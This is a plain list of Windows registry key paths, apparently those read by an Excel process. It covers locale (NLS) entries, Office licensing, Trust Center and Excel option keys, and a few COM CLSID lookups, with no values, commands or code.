HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-DM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-DM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-ER
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-FJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-FJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-FK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-FK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-FM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-FM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-JE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-JE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-KE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-KI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-KI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-KN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-KN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-KY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-KY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-LC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-LC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-LS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-LS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-MW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-MW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-PW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-PW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-RW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-RW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-SZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-SZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-TZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-UG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-UG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-UM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-UM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-VC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-VC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-VG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-VG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-VI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-VI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-VU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-VU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-WS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-WS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-ZM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-ZM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\eo-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\eo-001
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-BR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-BR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-BZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-BZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-CU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-CU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-GQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-GQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ewo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ewo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ewo-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ewo-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-GW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-GW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Adlm-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Adlm-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-CM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-GH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-GM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-GW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-GW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-LR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-NE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ff-Latn-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ff-Latn-SL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fo-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fo-DK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-CF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-CF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-CG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-CG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-DJ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-GQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-GQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-KM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-KM
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-NC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-NC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\AllowPNG
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\RelyOnVML
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DownloadComponents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotUseLongFileNames
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotOrganizeInFolder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotRelyOnCSS
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\PixelsPerInch
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\Encoding
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\SkipCorruptedDrawingDataOnLoad
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6768\0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\QFE_FlipPictures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\DeferredCheckDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride\{C845E028-E091-442E-8202-21F596C559A0}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LicenseAggregateSubscription
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Resiliency\TimeOfFailure
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration\DESKTOP-SEV4QOO\ProPlusRetail.AttemptGetKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\NextUserLicensingLicensedUserIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\RemoveOOBE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\TestFeatureMapping
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EligibleForExtendedGrace
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\FirstCleanValidation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData\excel.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableFontLinking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\MaxTrustedDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\PurgeInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\RulesFetchEndpoint
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{54E211B6-3650-4F75-8334-FA359598E1C5}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DrawInkTab
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\CanvasInkOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AnimationDiagnostic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\NoTrack
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\MaxPropsStreamSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FullCalcOnLoadOldFile
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{275c23e2-3747-11d0-9fea-00aa003f8646}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ReversedArrowTypeBracketsBraceOnBinarySave
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\ConvertRRectCalloutToFreeformForInscribedRect
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Draw\ConvertChevronToFreeformForInscribedRect
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\DisableDocumentAssemblies
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\BlockOleAutoActivate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CreateVbeProjOnLoad
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\DisableSmartDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\ReentryToken
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\infoCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\TrustBar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Kobe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\LineageTeachingCalloutTimeShown
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4DF0C730-DF9D-4AE3-9153-AA6B82E9795A}\InProcServer32\(Default)
